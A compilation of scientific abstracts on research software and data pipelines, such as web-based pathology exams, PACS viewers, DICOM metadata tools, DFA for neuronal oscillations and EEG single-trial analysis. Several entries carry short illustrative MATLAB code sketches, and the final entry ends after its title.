General and subject-specific practice examinations for students in health sciences studying pathology were placed onto a free public internet web site entitled WebPath and were accessible within four clicks of the home web site menu. Multiple choice questions were coded into .html files with JavaScript functions for web browser viewing in a timed format. A Perl programming language script with common gateway interface for web page forms scored examinations and placed results into a log file on an internet computer server. The four general review examinations of 30 questions each could be completed in up to 30 min. The 17 subject-specific examinations of 10 questions each with accompanying images could be completed in up to 15 min each. The results of scores and user educational field of study from log files were compiled from June 2006 to January 2014. The four general review examinations had 31,639 accesses with completion of all questions, for a completion rate of 54% and an average score of 75%. A score of 100% was achieved by 7% of users, ≥90% by 21%, and a ≥50% score by 95% of users. In top-to-bottom web page menu order, review examination usage was 44%, 24%, 17%, and 15% of all accessions. The 17 subject-specific examinations had 103,028 completions, with a completion rate of 73% and an average score of 74%. Scoring at 100% was 20% overall, ≥90% by 37%, and a ≥50% score by 90% of users. The first three menu items on the web page accounted for 12.6%, 10.0%, and 8.2% of all completions, and the bottom three accounted for no more than 2.2% each. Completion rates were higher for the shorter 10-question subject examinations. Users identifying themselves as MD/DO scored higher than other users, averaging 75%. Usage was higher for examinations at the top of the web page menu. Scores achieved suggest that a cohort of serious users fully completing the examinations had sufficient preparation to use them to support their pathology education.
Phased development of a web-based PACS viewer
NASA Astrophysics Data System (ADS)
Gidron, Yoad; Shani, Uri; Shifrin, Mark
2000-05-01
The Web browser is an excellent environment for the rapid development of an effective and inexpensive PACS viewer. In this paper we will share our experience in developing a browser-based viewer, from the inception and prototype stages to its current state of maturity. There are many operational advantages to a browser-based viewer, even when native viewers already exist in the system (with multiple and/or high resolution screens): (1) It can be used on existing personal workstations throughout the hospital. (2) It is easy to make the service available from physicians' homes. (3) The viewer is extremely portable and platform independent. There is a wide variety of means available for implementing the browser-based viewer. Each file sent to the client by the server can perform some end-user or client/server interaction. These means range from HTML (HyperText Markup Language) files, through JavaScript, to Java applets. Some data types may also invoke plug-in code in the client; although this reduces the portability of the viewer, it provides the needed efficiency in critical places. On the server side the range of means is also very rich: (1) a set of files: HTML, JavaScript, Java applets, etc.; (2) extensions of the server via cgi-bin programs; (3) extensions of the server via servlets; (4) any other helper application residing and working with the server to access the DICOM archive. The viewer architecture consists of two basic parts: the first part performs query and navigation through the DICOM archive image folders; the second part does the image access and display. While the first part deals with low data traffic, it involves many database transactions. The second part is simple as far as access transactions are concerned, but requires much more data traffic and display functions. Our web-based viewer has gone through three development stages characterized by the complexity of the means and tools employed on both client and server sides.
dada - a web-based 2D detector analysis tool
NASA Astrophysics Data System (ADS)
Osterhoff, Markus
2017-06-01
The data daemon, dada, is a server backend for unified access to 2D pixel detector image data stored with different detectors, file formats and saved with varying naming conventions and folder structures across instruments. Furthermore, dada implements basic pre-processing and analysis routines from pixel binning over azimuthal integration to raster scan processing. Common user interactions with dada are by a web frontend, but all parameters for an analysis are encoded into a Uniform Resource Identifier (URI) which can also be written by hand or scripts for batch processing.
DSN Beowulf Cluster-Based VLBI Correlator
NASA Technical Reports Server (NTRS)
Rogstad, Stephen P.; Jongeling, Andre P.; Finley, Susan G.; White, Leslie A.; Lanyi, Gabor E.; Clark, John E.; Goodhart, Charles E.
2009-01-01
The NASA Deep Space Network (DSN) requires a broadband VLBI (very long baseline interferometry) correlator to process data routinely taken as part of the VLBI source Catalogue Maintenance and Enhancement task (CAT M&E) and the Time and Earth Motion Precision Observations task (TEMPO). The data provided by these measurements are a crucial ingredient in the formation of precision deep-space navigation models. In addition, a VLBI correlator is needed to provide support for other VLBI-related activities for both internal and external customers. The JPL VLBI Correlator (JVC) was designed, developed, and delivered to the DSN as a successor to the legacy Block II Correlator. The JVC is a full-capability VLBI correlator that uses software processes running on multiple computers to cross-correlate two-antenna broadband noise data. Components of this new system (see Figure 1) consist of Linux PCs integrated into a Beowulf cluster, an existing Mark5 data storage system, a RAID array, an existing software correlator package (SoftC) originally developed for Delta DOR navigation processing, and various custom-developed software processes and scripts. Parallel processing on the JVC is achieved by assigning slave nodes of the Beowulf cluster to process separate scans in parallel until all scans have been processed. Due to the single-stream sequential playback of the Mark5 data, some ramp-up time is required before all nodes can have access to the required scan data. Core functions of each processing step are accomplished using optimized C programs. The coordination and execution of these programs across the cluster is accomplished using Perl scripts, PostgreSQL commands, and a handful of miscellaneous system utilities. Mark5 data modules are loaded on Mark5 data system playback units, one per station. Data processing is started when the operator scans the Mark5 systems and runs a script that reads various configuration files and then creates an experiment-dependent status database used to delegate parallel tasks between nodes and storage areas (see Figure 2). This script forks into three processes: extract, translate, and correlate. Each of these processes iterates on available scan data and updates the status database as the work for each scan is completed. The extract process coordinates and monitors the transfer of data from each of the Mark5s to the Beowulf RAID storage systems. The translate process monitors and executes the data conversion processes on available scan files, and writes the translated files to the slave nodes. The correlate process monitors the execution of SoftC correlation processes on the slave nodes for scans that have completed translation. A comparison of the JVC and the legacy Block II correlator outputs reveals that they agree to well within the formal errors, and that the data are comparable with respect to their use in flight navigation. The processing speed of the JVC is improved over the Block II correlator by a factor of 4, largely due to the elimination of the reel-to-reel tape drives used in the Block II correlator.
The Kepler Science Operations Center Pipeline Framework Extensions
NASA Technical Reports Server (NTRS)
Klaus, Todd C.; Cote, Miles T.; McCauliff, Sean; Girouard, Forrest R.; Wohler, Bill; Allen, Christopher; Chandrasekaran, Hema; Bryson, Stephen T.; Middour, Christopher; Caldwell, Douglas A.;
2010-01-01
The Kepler Science Operations Center (SOC) is responsible for several aspects of the Kepler Mission, including managing targets, generating on-board data compression tables, monitoring photometer health and status, processing the science data, and exporting the pipeline products to the mission archive. We describe how the generic pipeline framework software developed for Kepler is extended to achieve these goals, including pipeline configurations for processing science data and other support roles, and custom unit of work generators that control how the Kepler data are partitioned and distributed across the computing cluster. We describe the interface between the Java software that manages the retrieval and storage of the data for a given unit of work and the MATLAB algorithms that process these data. The data for each unit of work are packaged into a single file that contains everything needed by the science algorithms, allowing these files to be used to debug and evolve the algorithms offline.
Briel, L.I.
1993-01-01
A computer program was written to produce 6 different types of water-quality diagrams--Piper, Stiff, pie, X-Y, boxplot, and Piper 3-D--from the same file of input data. The Piper 3-D diagram is a new method that projects values from the surface of a Piper plot into a triangular prism to show how variations in chemical composition can be related to variations in other water-quality variables. This program is an analytical tool to aid in the interpretation of data. This program is interactive, and the user can select from a menu the type of diagram to be produced and a large number of individual features. Alternatively, these choices can be specified in the data file, which provides a batch mode for running the program. The program does not display water-quality diagrams directly; plots are written to a file. Four different plot-file formats are available: device-independent metafiles, Adobe PostScript graphics files, and two Hewlett-Packard graphics language formats (7475 and 7586). An ASCII data-table file is also produced to document the computed values. This program is written in Fortran 77 and uses graphics subroutines from either the PRIOR AGTK or the DISSPLA graphics library. The program has been implemented on Prime series 50 and Data General Aviion computers within the USGS; portability to other computing systems depends on the availability of the graphics library.
SU-F-T-476: Performance of the AS1200 EPID for Periodic Photon Quality Assurance
DOE Office of Scientific and Technical Information (OSTI.GOV)
DeMarco, J; Fraass, B; Yang, W
2016-06-15
Purpose: To assess the dosimetric performance of a new amorphous silicon flat-panel electronic portal imaging device (EPID) suitable for high-intensity, flattening-filter-free delivery mode. Methods: An EPID-based QA suite was created with automation to periodically monitor photon central-axis output and two-dimensional beam profile constancy as a function of gantry angle and dose rate. A Varian TrueBeam™ linear accelerator installed with Developer Mode was used to customize and deliver XML script routines for the QA suite using the dosimetry-mode image acquisition for an aS1200 EPID. Automatic post-processing software was developed to analyze the resulting DICOM images. Results: The EPID was used to monitor photon beam output constancy (central-axis), flatness, and symmetry over a period of 10 months for four photon beam energies (6x, 15x, 6xFFF, and 10xFFF). EPID results were consistent with those measured with a standard daily QA check device. At the four cardinal gantry angles, the standard deviation of the EPID central-axis output was <0.5%. Likewise, EPID measurements were independent of dose rate over the wide range of dose rates studied (including up to 2400 MU/min for 10xFFF), with a standard deviation of <0.8% relative to the nominal dose rate for each energy. Also, profile constancy and field size measurements showed good agreement with the reference acquisition at 0° gantry angle and nominal dose rate. XML script files were also tested for MU linearity and picket-fence delivery. Using Developer Mode, the test suite was delivered in <60 minutes for all 4 photon energies with 4 dose rates per energy and 5 picket-fence acquisitions. Conclusion: Dosimetry image acquisition using a new EPID was found to be accurate for standard and high-intensity photon beams over a broad range of dose rates over 10 months. Developer Mode provided an efficient platform to customize the EPID acquisitions by using custom script files, which significantly reduced the time required. This work was funded in part by Varian Medical Systems.
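The post-processing described above reduces each integrated EPID image to a few scalar constancy metrics. A minimal sketch of that reduction is given below; the central-ROI size, the flatness definition ((max-min)/(max+min) over the central 80% of the profile), and the use of dicomread on the acquired images are assumptions for illustration, not the actual analysis code.

    function qa = epidConstancy(dicomFile)
    % Hedged sketch: central-axis output and in-plane flatness/symmetry from one
    % dosimetry-mode EPID image. ROI sizes and metric definitions are assumptions.
        img = double(dicomread(dicomFile));
        [ny, nx] = size(img);
        cy = round(ny/2); cx = round(nx/2);

        roi = img(cy-5:cy+5, cx-5:cx+5);           % ~11x11 pixel central ROI
        qa.caxOutput = mean(roi(:));               % trend this value against baseline

        prof = img(cy, :);                         % in-plane (crossline) profile
        core = prof(round(0.1*nx):round(0.9*nx));  % central 80% of the field
        qa.flatness = (max(core) - min(core)) / (max(core) + min(core));
        qa.symmetry = max(abs(core - fliplr(core)) ./ core);  % point-by-point asymmetry
    end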
DATA MANAGEMENT SYSTEM FOR MOBILE SATELLITE PROPAGATION DATA
NASA Technical Reports Server (NTRS)
Kantak, A. V.
1994-01-01
The "Data Management System for Mobile Satellite Propogation" package is a collection of FORTRAN programs and UNIX shell scripts designed to handle the huge amounts of data resulting from Mobile Satellite propogation experiments. These experiments are designed to assist in defining channels for mobile satellite systems. By understanding multipath fading characteristics of the channel, doppler effects, and blockage due to manmade objects as well as natural surroundings, characterization of the channel can be realized. Propogation experiments, then, are performed using a prototype of the system simulating the ultimate product environment. After the data from these experiments is generated, the researcher must access this data with a minimum of effort and to derive some standard results. The programs included in this package manipulate the data files generated by the NASA/JPL Mobile Satellite propogation experiment on an interactive basis. In the experiment, a transmitter operating at 869 MHz was carried to an altitude of 32Km by a stratospheric balloon. A vehicle within the line-of-sight of the transmitter was then driven around, splitting the incoming signal into I and Q channels, and sampling the resulting signal strength at 1000 samples per second. The data was collected at various antenna elavation angles and different times of day generating the ancillary data for the experiment. This package contains a program to convert the binary format of the data generated into standard ASCII format suitable for use with a wide variety of machine architectures. Also included is a UNIX shell-script designed to parse this ASCII file into those records of data that match the researcher's desired values for the ancillary data parameters. In addition, four FORTRAN programs are included to obtain standard quantities from the data. Quantities such as probability of signal level greater than or equal to a specified signal level, probability density of the signal levels, frequency of fade duration, and Fourier Transforms of the sampled data can be generated from the propogation experiment data. All programs in this package are written in either FORTRAN 77 or UNIX shell-scripts. The package does not include test data. The programs were developed in 1987 for use with a UNIX operating system on a DEC MicroVAX computer.
Remote sensing image segmentation based on Hadoop cloud platform
NASA Astrophysics Data System (ADS)
Li, Jie; Zhu, Lingling; Cao, Fubin
2018-01-01
To address the slow speed and poor real-time performance of remote sensing image segmentation, this paper studies remote sensing image segmentation on the Hadoop platform. After analyzing the structural characteristics of the Hadoop cloud platform and its MapReduce programming model, this paper proposes an image segmentation method based on the combination of OpenCV and the Hadoop cloud platform. First, the MapReduce image processing model for the Hadoop cloud platform is designed, the image input and output are customized, and the splitting method for the data file is rewritten. Then the Mean Shift image segmentation algorithm is implemented. Finally, a segmentation experiment is carried out on a remote sensing image, and the same Mean Shift segmentation is implemented in MATLAB for comparison. The experimental results show that, while good segmentation quality is maintained, the segmentation speed of remote sensing images on the Hadoop cloud platform is greatly improved compared with single-machine MATLAB segmentation.
DPARSF: A MATLAB Toolbox for "Pipeline" Data Analysis of Resting-State fMRI.
Chao-Gan, Yan; Yu-Feng, Zang
2010-01-01
Resting-state functional magnetic resonance imaging (fMRI) has attracted more and more attention because of its effectiveness, simplicity and non-invasiveness in exploration of the intrinsic functional architecture of the human brain. However, a user-friendly toolbox for "pipeline" data analysis of resting-state fMRI is still lacking. Based on some functions in Statistical Parametric Mapping (SPM) and the Resting-State fMRI Data Analysis Toolkit (REST), we have developed a MATLAB toolbox called Data Processing Assistant for Resting-State fMRI (DPARSF) for "pipeline" data analysis of resting-state fMRI. After the user arranges the Digital Imaging and Communications in Medicine (DICOM) files and clicks a few buttons to set parameters, DPARSF will then give all the preprocessed (slice timing, realign, normalize, smooth) data and results for functional connectivity, regional homogeneity, amplitude of low-frequency fluctuation (ALFF), and fractional ALFF. DPARSF can also create a report for excluding subjects with excessive head motion and generate a set of pictures for easily checking the effect of normalization. In addition, users can also use DPARSF to extract time courses from regions of interest.
Automatic and efficient methods applied to the binarization of a subway map
NASA Astrophysics Data System (ADS)
Durand, Philippe; Ghorbanzadeh, Dariush; Jaupi, Luan
2015-12-01
The purpose of this paper is the study of efficient methods for image binarization, with the objective of binarizing metro maps. The goal is to binarize while preventing noise from disturbing the reading of subway stations. Different methods were tested; among them, the method of Otsu gives particularly interesting results. The difficulty of binarization lies in the choice of the threshold, so that the reconstructed image stays as close as possible to reality. Vectorization is a step subsequent to binarization. It consists of retrieving the coordinates of the points containing information and storing them in two matrices, X and Y. These matrices can then be exported to a CSV (comma-separated values) file, enabling them to be handled in a variety of software, including Excel. The algorithm takes considerable computation time in Matlab because it is composed of two nested "for" loops, and nested "for" loops are handled poorly by Matlab. This penalizes the computation time, but seemed the only method to do this.
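The thresholding and coordinate-extraction steps described above can be sketched with MATLAB's built-in Otsu threshold and the vectorized find function, which avoids explicit nested loops in the simplest case; the authors' actual algorithm may require the loop structure they describe. File names below are illustrative.

    % Hedged sketch: Otsu binarization of a map image and export of the foreground
    % pixel coordinates to a CSV file, using vectorized indexing instead of loops.
    img   = imread('metro_map.png');              % file name is illustrative
    gray  = rgb2gray(img);
    level = graythresh(gray);                     % Otsu's method
    bw    = imbinarize(gray, level);              % or im2bw(gray, level) on older releases

    [Y, X] = find(~bw);                           % dark (information-carrying) pixels
    writematrix([X Y], 'map_points.csv');         % readable in Excel and elsewhere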
Automated DICOM metadata and volumetric anatomical information extraction for radiation dosimetry
NASA Astrophysics Data System (ADS)
Papamichail, D.; Ploussi, A.; Kordolaimi, S.; Karavasilis, E.; Papadimitroulas, P.; Syrgiamiotis, V.; Efstathopoulos, E.
2015-09-01
Patient-specific dosimetry calculations based on simulation techniques have as a prerequisite the modeling of the modality system and the creation of voxelized phantoms. This procedure requires the knowledge of scanning parameters and patients’ information included in a DICOM file as well as image segmentation. However, the extraction of this information is complicated and time-consuming. The objective of this study was to develop a simple graphical user interface (GUI) to (i) automatically extract metadata from every slice image of a DICOM file in a single query and (ii) interactively specify the regions of interest (ROI) without explicit access to the radiology information system. The user-friendly application was developed in the Matlab environment. The user can select a series of DICOM files and manage their text and graphical data. The metadata are automatically formatted and presented to the user as a Microsoft Excel file. The volumetric maps are formed by interactively specifying the ROIs and by assigning a specific value in every ROI. The result is stored in DICOM format, for data and trend analysis. The developed GUI is easy to use, fast, and constitutes a very useful tool for individualized dosimetry. One of the future goals is to incorporate remote access to a PACS server.
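The per-slice metadata query can be sketched in a few lines: loop over the DICOM files of a series, pull a handful of header fields with dicominfo, and write the collected table to an Excel file. The folder name, the chosen tags (a CT example) and the output layout below are illustrative assumptions, not the actual GUI code.

    % Hedged sketch: collect scan parameters from every slice of a DICOM series
    % and export them to a spreadsheet. Field names are common CT DICOM tags.
    files = dir(fullfile('series01', '*.dcm'));   % folder name is illustrative
    n = numel(files);
    inst = zeros(n,1); loc = zeros(n,1); kvp = zeros(n,1); expo = zeros(n,1);
    for k = 1:n
        info = dicominfo(fullfile('series01', files(k).name));
        inst(k) = info.InstanceNumber;
        loc(k)  = info.SliceLocation;
        kvp(k)  = info.KVP;
        expo(k) = info.Exposure;
    end
    T = table(inst, loc, kvp, expo, ...
              'VariableNames', {'Instance','SliceLocation','kVp','Exposure'});
    writetable(T, 'series01_metadata.xlsx');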
ALC: automated reduction of rule-based models
Koschorreck, Markus; Gilles, Ernst Dieter
2008-01-01
Background Combinatorial complexity is a challenging problem for the modeling of cellular signal transduction since the association of a few proteins can give rise to an enormous amount of feasible protein complexes. The layer-based approach is an approximative, but accurate method for the mathematical modeling of signaling systems with inherent combinatorial complexity. The number of variables in the simulation equations is highly reduced and the resulting dynamic models show a pronounced modularity. Layer-based modeling allows for the modeling of systems not accessible previously. Results ALC (Automated Layer Construction) is a computer program that highly simplifies the building of reduced modular models, according to the layer-based approach. The model is defined using a simple but powerful rule-based syntax that supports the concepts of modularity and macrostates. ALC performs consistency checks on the model definition and provides the model output in different formats (C MEX, MATLAB, Mathematica and SBML) as ready-to-run simulation files. ALC also provides additional documentation files that simplify the publication or presentation of the models. The tool can be used offline or via a form on the ALC website. Conclusion ALC allows for a simple rule-based generation of layer-based reduced models. The model files are given in different formats as ready-to-run simulation files. PMID:18973705
Calderon, Karynna; Dadisman, Shawn V.; Tihansky, Ann B.; Lewelling, Bill R.; Flocks, James G.; Wiese, Dana S.; Kindinger, Jack G.; Harrison, Arnell S.
2006-01-01
In October and November of 1995 and February of 1996, the U.S. Geological Survey, in cooperation with the Southwest Florida Water Management District, conducted geophysical surveys of the Peace River in west-central Florida from east of Bartow to west of Arcadia. This report serves as an archive of unprocessed digital boomer seismic reflection data, trackline maps, navigation files, GIS files, Field Activity Collection System (FACS) logs, observers' logbooks, and formal FGDC metadata. Filtered and gained digital images of the seismic profiles are also provided. Refer to the Acronyms page for expansion of acronyms and abbreviations used in this report. The archived trace data are in standard Society of Exploration Geophysicists (SEG) SEG-Y format (Barry and others, 1975) and may be downloaded and processed with commercial or public domain software such as Seismic Unix (SU). Example SU processing scripts and USGS software for viewing the SEG-Y files (Zihlman, 1992) are also provided.
On the optical path length in refracting media
NASA Astrophysics Data System (ADS)
Hasbun, Javier E.
2018-04-01
The path light follows as it travels through a substance depends on the substance's index of refraction. This path is commonly known as the optical path length (OPL). In geometrical optics, the laws of reflection and refraction are simple examples for understanding the path of light travel from source to detector for constant values of the traveled substances' refraction indices. In more complicated situations, the Euler equation can be quite useful, and it is important in optics courses. Here, the well-known Euler differential equation (EDE) is used to obtain the OPL for several index of refraction models. For pedagogical completeness, the OPL is also obtained through a modified Monte Carlo (MC) method, versus which the various results obtained through the EDE are compared. The examples developed should be important in projects involving undergraduate as well as graduate students in an introductory optics course. A simple Matlab script (program) is included that can be modified by students who wish to pursue the subject further.
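For an index that varies with height only, the Euler equation admits the first integral n(y)/sqrt(1 + y'^2) = C (a Beltrami/Snell-type invariant), which makes a numerical OPL computation short. The sketch below integrates the ray for a linear profile n(y) = n0 + a*y; it is an independent illustration of the approach, not the script distributed with the paper, and the profile and launch conditions are arbitrary choices.

    % Hedged sketch: ray path and optical path length (OPL) for n(y) = n0 + a*y,
    % using the first integral n(y)/sqrt(1 + y'^2) = C of the Euler equation.
    n0 = 1.0; a = 0.1;                  % illustrative index profile n(y) = n0 + a*y
    n  = @(y) n0 + a*y;

    theta0 = 10*pi/180;                 % launch angle above the x-axis at the origin
    C = n(0)*cos(theta0);               % invariant fixed by the initial condition

    dydx = @(x, y) sqrt(max((n(y)/C).^2 - 1, 0));   % ray slope from the invariant
    [x, y] = ode45(dydx, linspace(0, 5, 500), 0);   % propagate from x = 0 to x = 5

    % Along the ray, n*sqrt(1 + y'^2) = n.^2/C, so the OPL integral simplifies:
    OPL = trapz(x, n(y).^2 / C);
    fprintf('OPL over 0 <= x <= 5: %.4f\n', OPL);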
PYCHEM: a multivariate analysis package for python.
Jarvis, Roger M; Broadhurst, David; Johnson, Helen; O'Boyle, Noel M; Goodacre, Royston
2006-10-15
We have implemented a multivariate statistical analysis toolbox, with an optional standalone graphical user interface (GUI), using the Python scripting language. This is a free and open source project that addresses the need for a multivariate analysis toolbox in Python. Although the functionality provided does not cover the full range of multivariate tools that are available, it has a broad complement of methods that are widely used in the biological sciences. In contrast to tools like MATLAB, PyChem 2.0.0 is easily accessible and free, allows for rapid extension using a range of Python modules and is part of the growing amount of complementary and interoperable scientific software in Python based upon SciPy. One of the attractions of PyChem is that it is an open source project and so there is an opportunity, through collaboration, to increase the scope of the software and to continually evolve a user-friendly platform that has applicability across a wide range of analytical and post-genomic disciplines. http://sourceforge.net/projects/pychem
NASA Astrophysics Data System (ADS)
Mishra, Aanand Kumar; Singh, Ajay; Bahadur Singh, Akal
2018-06-01
High arch dams are widely used in the development of storage-type hydropower projects because of their economic advantage. Among the different phases considered during the lifetime of a dam, control of the dam's safety and performance is of particular concern. This paper proposes a 3-D finite element method (FEM) for stress and deformation analysis of a double-curvature arch dam, considering the non-linearity of the foundation rock following the Hoek-Brown criterion. The proposed methodology is implemented in the MATLAB scripting language and applied to the double-curvature arch dam proposed for the Budhi Gandaki hydropower project. The stresses developed in the foundation rock and the compressive and tensile stresses acting on the dam are investigated and analysed for variations in reservoir level. Deformation at the top of the dam and in the foundation rock is also investigated. In addition, the variation of stress and deformation in the foundation rock is analysed for various rock properties.
Securing Color Fidelity in 3D Architectural Heritage Scenarios.
Gaiani, Marco; Apollonio, Fabrizio Ivan; Ballabeni, Andrea; Remondino, Fabio
2017-10-25
Ensuring color fidelity in image-based 3D modeling of heritage scenarios is nowadays still an open research matter. Image colors are important during the data processing as they affect algorithm outcomes, therefore their correct treatment, reduction and enhancement is fundamental. In this contribution, we present an automated solution developed to improve the radiometric quality of an image dataset and the performance of two main steps of the photogrammetric pipeline (camera orientation and dense image matching). The suggested solution aims to achieve a robust automatic color balance and exposure equalization, stability of the RGB-to-gray image conversion and faithful color appearance of a digitized artifact. The innovative aspects of the article are: complete automation, better color target detection, a MATLAB implementation of the ACR scripts created by Fraser and the use of a specific weighted polynomial regression. A series of tests are presented to demonstrate the efficiency of the developed methodology and to evaluate color accuracy ('color characterization').
Revisiting Hansen Solubility Parameters by Including Thermodynamics.
Louwerse, Manuel J; Maldonado, Ana; Rousseau, Simon; Moreau-Masselon, Chloe; Roux, Bernard; Rothenberg, Gadi
2017-11-03
The Hansen solubility parameter approach is revisited by implementing the thermodynamics of dissolution and mixing. Hansen's pragmatic approach has earned its spurs in predicting solvents for polymer solutions, but for molecular solutes improvements are needed. By going into the details of entropy and enthalpy, several corrections are suggested that make the methodology thermodynamically sound without losing its ease of use. The most important corrections include accounting for the solvent molecules' size, the destruction of the solid's crystal structure, and the specificity of hydrogen-bonding interactions, as well as opportunities to predict the solubility at extrapolated temperatures. Testing the original and the improved methods on a large industrial dataset including solvent blends, fit qualities improved from 0.89 to 0.97 and the percentage of correct predictions rose from 54 % to 78 %. Full Matlab scripts are included in the Supporting Information, allowing readers to implement these improvements on their own datasets. © 2017 Wiley-VCH Verlag GmbH & Co. KGaA, Weinheim.
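For readers unfamiliar with the baseline method being corrected, the classical Hansen metric scores a solvent by its distance Ra to the solute in (deltaD, deltaP, deltaH) space, Ra^2 = 4(dD)^2 + (dP)^2 + (dH)^2, and compares it with the interaction radius R0. The sketch below implements only that textbook formula with illustrative numbers; the thermodynamic corrections proposed in the paper are not reproduced here.

    % Hedged sketch: classical (uncorrected) Hansen solubility distance and RED number.
    solute  = [18.0, 9.0, 7.0];          % [deltaD, deltaP, deltaH] in MPa^0.5 (illustrative)
    solvent = [15.8, 8.8, 19.4];         % roughly ethanol-like values
    R0 = 8.0;                            % interaction radius of the solute (illustrative)

    d   = solute - solvent;
    Ra  = sqrt(4*d(1)^2 + d(2)^2 + d(3)^2);
    RED = Ra / R0;                       % RED < 1 predicts a good solvent
    fprintf('Ra = %.2f MPa^{0.5}, RED = %.2f\n', Ra, RED);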
DOE Office of Scientific and Technical Information (OSTI.GOV)
Rodriguez, Sal
2017-08-24
The code (a computer program written as a Matlab script) uses a unique set of n independent equations to solve for n turbulence variables. The code requires the input of a characteristic dimension, a characteristic fluid velocity, the fluid dynamic viscosity, and the fluid density. Most importantly, the code estimates the size of three key turbulent eddies: Kolmogorov, Taylor, and integral. Based on the eddy sizes, dimple dimensions are prescribed such that the key eddies (principally Taylor, and sometimes Kolmogorov) can be generated by the dimple rim and flow unimpeded through the dimple's concave cavity. It is hypothesized that turbulent eddies are generated by the dimple rim at the dimple-surface interface. The newly-generated eddies in turn entrain the movement of surrounding regions of fluid, creating more mixing. The eddies also generate lift near the wall surrounding the dimple, as they accelerate and reduce pressure in the regions near and at the dimple cavity, thereby minimizing the fluid drag.
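The eddy-size estimates at the heart of the code can be illustrated with standard isotropic-turbulence scalings: taking the integral scale of the order of the characteristic dimension L and the Reynolds number based on L, the Taylor microscale goes as L*sqrt(10)*Re^(-1/2) and the Kolmogorov scale as L*Re^(-3/4). The sketch below uses these textbook relations with placeholder inputs; the actual code may use different constants or correlations.

    % Hedged sketch: order-of-magnitude eddy sizes from the four inputs the code asks for.
    L   = 0.05;        % characteristic dimension [m] (illustrative)
    U   = 2.0;         % characteristic velocity [m/s]
    mu  = 1.0e-3;      % dynamic viscosity [Pa s] (water-like)
    rho = 998;         % density [kg/m^3]

    Re = rho*U*L/mu;                    % Reynolds number based on L
    ell    = L;                         % integral scale ~ characteristic dimension
    lambda = L*sqrt(10)*Re^(-1/2);      % Taylor microscale (isotropic estimate)
    eta    = L*Re^(-3/4);               % Kolmogorov scale
    fprintf('Re = %.3g: integral %.2e m, Taylor %.2e m, Kolmogorov %.2e m\n', ...
            Re, ell, lambda, eta);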
Detrended Fluctuation Analysis: A Scale-Free View on Neuronal Oscillations
Hardstone, Richard; Poil, Simon-Shlomo; Schiavone, Giuseppina; Jansen, Rick; Nikulin, Vadim V.; Mansvelder, Huibert D.; Linkenkaer-Hansen, Klaus
2012-01-01
Recent years of research have shown that the complex temporal structure of ongoing oscillations is scale-free and characterized by long-range temporal correlations. Detrended fluctuation analysis (DFA) has proven particularly useful, revealing that genetic variation, normal development, or disease can lead to differences in the scale-free amplitude modulation of oscillations. Furthermore, amplitude dynamics is remarkably independent of the time-averaged oscillation power, indicating that the DFA provides unique insights into the functional organization of neuronal systems. To facilitate understanding and encourage wider use of scaling analysis of neuronal oscillations, we provide a pedagogical explanation of the DFA algorithm and its underlying theory. Practical advice on applying DFA to oscillations is supported by MATLAB scripts from the Neurophysiological Biomarker Toolbox (NBT) and links to the NBT tutorial website http://www.nbtwiki.net/. Finally, we provide a brief overview of insights derived from the application of DFA to ongoing oscillations in health and disease, and discuss the putative relevance of criticality for understanding the mechanism underlying scale-free modulation of oscillations. PMID:23226132
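For readers who want the algorithm itself rather than the toolbox, the core of DFA fits in a short function: integrate the mean-removed signal, split it into windows, remove a linear trend in each window, and read the scaling exponent off the log-log slope of the fluctuation function. The sketch below is a generic implementation of that textbook recipe, not the NBT code.

    function [alpha, n, F] = dfa(x, winSizes)
    % Hedged generic DFA sketch: returns the scaling exponent alpha and the
    % fluctuation function F(n) for the window sizes given in winSizes (samples).
        y = cumsum(x(:) - mean(x));            % integrated, mean-removed profile
        F = zeros(size(winSizes));
        for k = 1:numel(winSizes)
            n_k  = winSizes(k);
            nSeg = floor(numel(y) / n_k);
            rms2 = zeros(nSeg, 1);
            for s = 1:nSeg
                seg = y((s-1)*n_k + (1:n_k));
                t   = (1:n_k)';
                p   = polyfit(t, seg, 1);      % local linear detrending
                rms2(s) = mean((seg - polyval(p, t)).^2);
            end
            F(k) = sqrt(mean(rms2));
        end
        n = winSizes;
        c = polyfit(log10(n(:)), log10(F(:)), 1);
        alpha = c(1);                          % DFA exponent (0.5 = uncorrelated noise)
    end

For an oscillation amplitude envelope sampled at, say, 250 Hz, window sizes logarithmically spaced between roughly 1 and 30 s would be a typical call: alpha = dfa(envelope, round(logspace(log10(250), log10(7500), 15))).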
Frömer, Romy; Maier, Martin; Abdel Rahman, Rasha
2018-01-01
Here we present an application of an EEG processing pipeline customizing EEGLAB and FieldTrip functions, specifically optimized to flexibly analyze EEG data based on single-trial information. The key component of our approach is to create a comprehensive 3-D EEG data structure including all trials and all participants, maintaining the original order of recording. This allows straightforward access to subsets of the data based on any information available in a behavioral data structure matched with the EEG data (experimental conditions, but also performance indicators, such as accuracy or RTs of single trials). In the present study we exploit this structure to compute linear mixed models (LMMs, using lmer in R) including random intercepts and slopes for items. This information can easily be read out from the matched behavioral data, whereas it might not be accessible in traditional ERP approaches without substantial effort. We further provide easily adaptable scripts for performing cluster-based permutation tests (as implemented in FieldTrip), as a more robust alternative to traditional omnibus ANOVAs. Our approach is particularly advantageous for data with parametric within-subject covariates (e.g., performance) and/or multiple complex stimuli (such as words, faces or objects) that vary in features affecting cognitive processes and ERPs (such as word frequency, salience or familiarity), which are sometimes hard to control experimentally or might themselves constitute variables of interest. The present dataset was recorded from 40 participants who performed a visual search task on previously unfamiliar objects, presented either visually intact or blurred. MATLAB as well as R scripts are provided that can be adapted to different datasets.
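The central idea, a single channels x time x trials array aligned with a behavioral table, can be illustrated as below. Variable and field names (eegAll, beh.accuracy, beh.rt) are hypothetical, and lmer itself runs in R; only the MATLAB-side subsetting and export are sketched.

    % Hedged sketch: keep all trials of all participants in one 3-D array and select
    % single-trial subsets from the matched behavioral table. Names are hypothetical.
    nChan = 64; nTime = 500; nTrials = 12000;
    eegAll = randn(nChan, nTime, nTrials, 'single');   % channels x time x trials
    beh = table((1:nTrials)', randi([0 1], nTrials, 1), 200 + 800*rand(nTrials, 1), ...
                'VariableNames', {'trial', 'accuracy', 'rt'});

    % e.g. ERP (trial average) restricted to correct, fast responses:
    sel = beh.accuracy == 1 & beh.rt < 600;
    erpCorrectFast = mean(eegAll(:, :, sel), 3);

    % Single-trial amplitudes in a time window, ready to be exported for lmer in R:
    win = 150:200;                                     % sample indices of interest
    singleTrialAmp = squeeze(mean(mean(eegAll(:, win, :), 1), 2));
    writetable([beh, table(singleTrialAmp)], 'single_trial_amplitudes.csv');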
Recent improvements in monitoring Hawaiian volcanoes with webcams and thermal cameras
NASA Astrophysics Data System (ADS)
